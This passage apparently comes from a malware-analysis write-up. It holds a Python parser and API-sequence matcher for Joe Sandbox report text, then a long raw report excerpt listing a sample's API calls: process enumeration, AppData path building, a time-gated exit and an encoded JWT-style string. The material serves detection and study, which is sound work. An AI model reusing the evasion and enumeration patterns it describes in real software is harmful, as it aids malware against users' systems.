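# optional comma, then "ref: <address>"; lines without parentheses ("sscanf.NTDLL ref: ...") match too.
API_RE = re.compile(r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?"
                    r"(?P<name>[\w:]+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")

@dataclass
class ApiCall:
    name: str
    module: str
    args: list                        # int for hex literals, None for '?', str otherwise
    ref: int                          # call-site address
    subcall_of: Optional[int] = None  # callee that really makes this call, for subcall lines

@dataclass
class FunctionEntry:
    calls: list = field(default_factory=list)
    def direct_calls(self):
        """Names the function itself calls, in listing order; subcall lines excluded."""
        return [c.name for c in self.calls if c.subcall_of is None]

def _parse_arg(tok):
    tok = tok.strip()
    if tok in ("", "?"):
        return None
    return int(tok, 16) if re.fullmatch(r"[0-9A-Fa-f]+", tok) else tok  # e.g. the literal ERROR

def parse_entries(text):
    """One FunctionEntry per 'APIs' block; parsing stops at the block's 'Memory Dump Source'."""
    entries, in_apis = [], False
    for line in text.splitlines():
        s = line.strip()
        if s == "APIs":
            entries.append(FunctionEntry())
            in_apis = True
        elif s == "Memory Dump Source":
            in_apis = False
        elif in_apis and (m := API_RE.match(line)):
            args = [_parse_arg(a) for a in m["args"].split(",")] if m["args"] is not None else []
            sub = int(m["sub"], 16) if m["sub"] else None
            entries[-1].calls.append(ApiCall(m["name"], m["mod"], args, int(m["ref"], 16), sub))
    return entries

HKEYS = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
         0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS"}
KEY_READ = 0x20019  # READ_CONTROL | KEY_QUERY_VALUE | KEY_ENUMERATE_SUB_KEYS | KEY_NOTIFY
KEY_RIGHTS = {0x1: "KEY_QUERY_VALUE", 0x2: "KEY_SET_VALUE", 0x4: "KEY_CREATE_SUB_KEY",
              0x8: "KEY_ENUMERATE_SUB_KEYS", 0x10: "KEY_NOTIFY", 0x20: "KEY_CREATE_LINK",
              0x100: "KEY_WOW64_64KEY", 0x200: "KEY_WOW64_32KEY", 0x20000: "READ_CONTROL"}

def decode_sam(sam):
    """Expand a samDesired mask into names, collapsing the KEY_READ composite first."""
    if sam is None:
        return ["?"]
    names = ["KEY_READ"] if sam & KEY_READ == KEY_READ else []
    sam &= ~KEY_READ if names else ~0
    names += [n for bit, n in KEY_RIGHTS.items() if sam & bit]
    return names + ([hex(r)] if (r := sam & ~sum(KEY_RIGHTS)) else [])  # unknown bits kept as hex

def decode_reg_open(entry):
    """(hKey name, samDesired names) of the function's first RegOpenKeyExA, else None."""
    for c in entry.calls:
        if c.name == "RegOpenKeyExA" and c.subcall_of is None and len(c.args) >= 4:
            hkey = c.args[0]
            return HKEYS.get(hkey, "?" if hkey is None else hex(hkey)), decode_sam(c.args[3])
    return None

# Rule names are this example's reading of the sequences, not labels the report assigns.
RULES = {
    "time-gated exit: date parsed by sscanf, compared as FILETIME, then ExitProcess":
        ["GetSystemTime", "sscanf", "SystemTimeToFileTime", "ExitProcess"],
    "registry value read": ["RegOpenKeyExA", "RegQueryValueExA", "RegCloseKey"],
}

def _is_subsequence(needle, hay):
    it = iter(hay)  # ordered match with gaps: unrelated calls in between are allowed
    return all(any(n == h for h in it) for n in needle)

def match_rules(entry):
    return [name for name, seq in RULES.items() if _is_subsequence(seq, entry.direct_calls())]
```

Run parse_entries over the report text, then match_rules and decode_reg_open on each entry. On the two entries above the first matches the time-gated rule and the second decodes its RegOpenKeyExA arguments to HKEY_LOCAL_MACHINE with KEY_READ | KEY_WOW64_64KEY, i.e. this 32-bit image (the listing's addresses are 32-bit) explicitly asks for the 64-bit registry view, which is worth noting when reproducing the read on an analysis box. Rules are matched against direct calls only, so the lstrcpy/lstrlen noise that "Part of subcall" lines add from string helpers does not pollute the sequence.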
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                             • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: String___crt$Type
                            • String ID:
                            • API String ID: 2109742289-3916222277
                            • Opcode ID: 376b735f35966d527e3ed39931da9a35e10e9da25f3e3c09fff391b1b4a2e1a1
                            • Instruction ID: 84d3e465f60875aae91514a7a7d11a7f445356988f29084ada78c6f5bc105eed
                            • Opcode Fuzzy Hash: 376b735f35966d527e3ed39931da9a35e10e9da25f3e3c09fff391b1b4a2e1a1
                            • Instruction Fuzzy Hash: 1041F5B050479C9EDB318B248C85BFBBBFCAF45704F1444E8E98A871C3E2759A459F60
                            APIs
                            • std::_Xinvalid_argument.LIBCPMT ref: 008E8996
                              • Part of subcall function 0090A3D0: std::exception::exception.LIBCMT ref: 0090A3E5
                              • Part of subcall function 0090A3D0: std::exception::exception.LIBCMT ref: 0090A40B
                            • std::_Xinvalid_argument.LIBCPMT ref: 008E89CD
                              • Part of subcall function 0090A383: std::exception::exception.LIBCMT ref: 0090A398
                              • Part of subcall function 0090A383: std::exception::exception.LIBCMT ref: 0090A3BE
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                             • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: std::exception::exception$Xinvalid_argumentstd::_
                            • String ID: invalid string position$string too long
                            • API String ID: 2002836212-4289949731
                            • Opcode ID: 6aed95a0858cb2e5a8a99672940d87be729c878d5d02f5305ca689cf36352678
                            • Instruction ID: b4d8bafafe32677a7c1ebbe3f0303a9d9c3b159d9be589fb6f0f06a9167258b1
                            • Opcode Fuzzy Hash: 6aed95a0858cb2e5a8a99672940d87be729c878d5d02f5305ca689cf36352678
                            • Instruction Fuzzy Hash: 5021A672700694CBC720DA5EE840A6EF799FBA2761B15093FF15ACB681CA71D841C3E6
                            APIs
                            • std::_Xinvalid_argument.LIBCPMT ref: 008E8883
                              • Part of subcall function 0090A383: std::exception::exception.LIBCMT ref: 0090A398
                              • Part of subcall function 0090A383: std::exception::exception.LIBCMT ref: 0090A3BE
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                             • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: std::exception::exception$Xinvalid_argumentstd::_
                            • String ID: vector<T> too long$yxxx$yxxx
                            • API String ID: 2002836212-1517697755
                            • Opcode ID: 2b7ca996ad5b75042ff098619bd9c004097ae4367fe159819cbbd75297829a50
                            • Instruction ID: 4873d71f2fbf5b8e981c5bf8ac64d4579ff36c2ef5b3290f4226c59970a30629
                            • Opcode Fuzzy Hash: 2b7ca996ad5b75042ff098619bd9c004097ae4367fe159819cbbd75297829a50
                            • Instruction Fuzzy Hash: 3C3197B5E005199FCB08DF59C8916ADBBB6FB89310F148269E909EF385DB30AD01CBD1
                            APIs
                            • std::_Xinvalid_argument.LIBCPMT ref: 00905B32
                              • Part of subcall function 0090A383: std::exception::exception.LIBCMT ref: 0090A398
                              • Part of subcall function 0090A383: std::exception::exception.LIBCMT ref: 0090A3BE
                            • std::_Xinvalid_argument.LIBCPMT ref: 00905B45
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                             • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Xinvalid_argumentstd::_std::exception::exception
                            • String ID: Sec-WebSocket-Version: 13$string too long
                            • API String ID: 1928653953-3304177573
                            • Opcode ID: 9ff38a13cd2086ee2024df62adb990d88733b512d2fe649c5a058807f503df23
                            • Instruction ID: 2395efd19976ff635ca680c763e9890c66de7e6f87383436355e3af379cfc266
                            • Opcode Fuzzy Hash: 9ff38a13cd2086ee2024df62adb990d88733b512d2fe649c5a058807f503df23
                            • Instruction Fuzzy Hash: 72115631304B418FC7319A2CE800B1B77E6ABD1B20F250B5DE091CB6C5D761E841CFA1
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,?,0090A640,000000FF), ref: 00903EF0
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00903EF7
                            • wsprintfA.USER32 ref: 00903F07
                              • Part of subcall function 009073F0: lstrcpy.KERNEL32(00000000,ERROR), ref: 0090740E
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                             • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateProcesslstrcpywsprintf
                            • String ID: %dx%d
                            • API String ID: 1695172769-2206825331
                            • Opcode ID: 054708ea7389511e6372625ce8ff5d92cbf9f1d566bffe8103464027a8115e43
                            • Instruction ID: 526396954675680ac76ff45a14506d0615133ab81c9d1d336bc8fb810865fb66
                            • Opcode Fuzzy Hash: 054708ea7389511e6372625ce8ff5d92cbf9f1d566bffe8103464027a8115e43
                            • Instruction Fuzzy Hash: A201C071A40354BFE7209B95DC0EFAABB68FB49B61F448115FA05972D0CBB41900C6A1
                            APIs
                            • std::_Xinvalid_argument.LIBCPMT ref: 008E8737
                              • Part of subcall function 0090A383: std::exception::exception.LIBCMT ref: 0090A398
                              • Part of subcall function 0090A383: std::exception::exception.LIBCMT ref: 0090A3BE
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                             • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: std::exception::exception$Xinvalid_argumentstd::_
                            • String ID: vector<T> too long$yxxx$yxxx
                            • API String ID: 2002836212-1517697755
                            APIs
                              • Part of subcall function 009073F0: lstrcpy.KERNEL32(00000000,ERROR), ref: 0090740E
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00903C66
                            • Process32First.KERNEL32(00000000,00000128), ref: 00903C79
                            • Process32Next.KERNEL32(00000000,00000128), ref: 00903C8F
                              • Part of subcall function 00907520: lstrlen.KERNEL32(------,008E5BEB), ref: 0090752B
                              • Part of subcall function 00907520: lstrcpy.KERNEL32(00000000), ref: 0090754F
                              • Part of subcall function 00907520: lstrcat.KERNEL32(?,------), ref: 00907559
                              • Part of subcall function 00907490: lstrcpy.KERNEL32(00000000), ref: 009074BE
                            • CloseHandle.KERNEL32(00000000), ref: 00903DC7
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                            • String ID:
                            • API String ID: 1066202413-0
                            APIs
                            • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 008FE724
                            • lstrcpy.KERNEL32(00000000,?), ref: 008FE753
                            • lstrcat.KERNEL32(?,00000000), ref: 008FE761
                            • lstrcat.KERNEL32(?,012FE160), ref: 008FE77C
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$FolderPathlstrcpy
                            • String ID:
                            • API String ID: 818526691-0
                            APIs
                            Strings
                            • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 009021AF, 009021C5, 00902287
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: strlen
                            • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                            • API String ID: 39653677-4138519520
                            APIs
                            • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 008FED94
                            • lstrcpy.KERNEL32(00000000,?), ref: 008FEDC3
                            • lstrcat.KERNEL32(?,00000000), ref: 008FEDD1
                            • lstrcat.KERNEL32(?,012FF828), ref: 008FEDEC
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$FolderPathlstrcpy
                            • String ID:
                            • API String ID: 818526691-0
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,?,00000000,0090A5E0,000000FF), ref: 00902D5F
                            • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 00902D66
                            • GetLocalTime.KERNEL32(?,?,00000000,0090A5E0,000000FF), ref: 00902D72
                            • wsprintfA.USER32 ref: 00902D9E
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateLocalProcessTimewsprintf
                            • String ID:
                            • API String ID: 377395780-0
                            APIs
                            • OpenProcess.KERNEL32(00000410,00000000), ref: 009046A2
                            • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 009046BD
                            • CloseHandle.KERNEL32(00000000), ref: 009046C4
                            • lstrcpy.KERNEL32(00000000,?), ref: 009046F7
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseFileHandleModuleNameOpenProcesslstrcpy
                            • String ID:
                            • API String ID: 4028989146-0
                            APIs
                            • __getptd.LIBCMT ref: 009091ED
                              • Part of subcall function 00908A0F: __amsg_exit.LIBCMT ref: 00908A1F
                            • __getptd.LIBCMT ref: 00909204
                            • __amsg_exit.LIBCMT ref: 00909212
                            • __updatetlocinfoEx_nolock.LIBCMT ref: 00909236
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                            • String ID:
                            • API String ID: 300741435-0
                            APIs
                            • lstrlen.KERNEL32(------,008E5BEB), ref: 0090752B
                            • lstrcpy.KERNEL32(00000000), ref: 0090754F
                            • lstrcat.KERNEL32(?,------), ref: 00907559
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcatlstrcpylstrlen
                            • String ID: ------
                            • API String ID: 3050337572-882505780
                            • Opcode ID: 33448610d8ec54b1a392dfb98a709b7298839e8375bb1fb8ed8e25abef9d969d
                            • Instruction ID: 38e455c2d236ec69c2c718f7191d43c8afea806e4d40916c3a8d44e3d2345ace
                            • Opcode Fuzzy Hash: 33448610d8ec54b1a392dfb98a709b7298839e8375bb1fb8ed8e25abef9d969d
                            • Instruction Fuzzy Hash: B0F0C9749117429FDB209F79DC58966BBF9EF85711314882DA89AC7295EB30E841CB10
                            APIs
                              • Part of subcall function 008E1530: lstrcpy.KERNEL32(00000000,?), ref: 008E1557
                              • Part of subcall function 008E1530: lstrcpy.KERNEL32(00000000,?), ref: 008E1579
                              • Part of subcall function 008E1530: lstrcpy.KERNEL32(00000000,?), ref: 008E159B
                              • Part of subcall function 008E1530: lstrcpy.KERNEL32(00000000,?), ref: 008E15FF
                            • lstrcpy.KERNEL32(00000000,?), ref: 008F3572
                            • lstrcpy.KERNEL32(00000000,?), ref: 008F359B
                            • lstrcpy.KERNEL32(00000000,?), ref: 008F35C1
                            • lstrcpy.KERNEL32(00000000,?), ref: 008F35E7
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy
                            • String ID:
                            • API String ID: 3722407311-0
                            • Opcode ID: d6be6554accd031ce7d206edfe7d70fc6b713d160bc588bdcf76e43f90cad6b7
                            • Instruction ID: 564bf56aa466d337a64c0290495239b20082752436927ca9a15becd5faa70a9f
                            • Opcode Fuzzy Hash: d6be6554accd031ce7d206edfe7d70fc6b713d160bc588bdcf76e43f90cad6b7
                            • Instruction Fuzzy Hash: E6122A70A112059FDB28CF2AC554B25B7E4FF44718B29C0AEE909DB3A2D776DD82CB40
                            APIs
                            • std::_Xinvalid_argument.LIBCPMT ref: 008F7DD4
                            • std::_Xinvalid_argument.LIBCPMT ref: 008F7DEF
                              • Part of subcall function 008F7E80: std::_Xinvalid_argument.LIBCPMT ref: 008F7E98
                              • Part of subcall function 008F7E80: std::_Xinvalid_argument.LIBCPMT ref: 008F7EB6
